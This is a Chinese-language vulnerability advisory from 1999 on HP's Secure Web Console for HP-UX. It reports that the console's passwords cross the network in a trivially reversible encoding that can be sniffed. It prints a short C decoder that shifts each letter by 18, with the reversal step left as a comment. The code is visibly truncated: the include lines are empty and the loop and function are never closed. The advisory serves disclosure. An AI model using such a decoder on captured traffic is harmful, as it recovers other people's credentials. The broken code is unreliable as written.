发布日期：1999-12-07
更新日期：1999-12-07

受影响系统：

HP-UX

描述：

---

概要   
  
HP公司的安全WEB控制台（Secure Web Console）是一个类似于JetDirect打印服务器的设备。它安装了一个以太网接口和一个串行口，你可以使用HP9000等机器通过控制台电线连接到该设备，从而将这台设备连入网络。这样，当你通过WEB浏览器连接到HP9000时，就可以远程访问该控制台了。由于该远程访问是直接的，你甚至无需在本地就升级或重启控制台到单用户模式下。   
然而，这个"安全控制台"存在一个非常严重的漏洞。该漏洞可让任何人窃听口令、使用附加的实例程序、获取明文口令。   
  
  
详细资料：   
  
以下代码可以截取HP安全WEB控制台客户端通过网络发送给HP安全WEB控制台的明文口令：   
  
  
#include   
#include   
  
void main() {   
int user_input;   
while((user_input=getchar())) {   
  
if (islower(user_input))   
user_input = ''a'' + (user_input - ''a'' + 18) % 26;   
if (isupper(user_input))   
user_input = ''A'' + (user_input - ''A'' + 18) % 26;   
  
/* convert to string and put a reverse string function here */   
putchar(user_input);   


建议：

---

暂无

浏览次数：7411
严重程度：0（网友投票）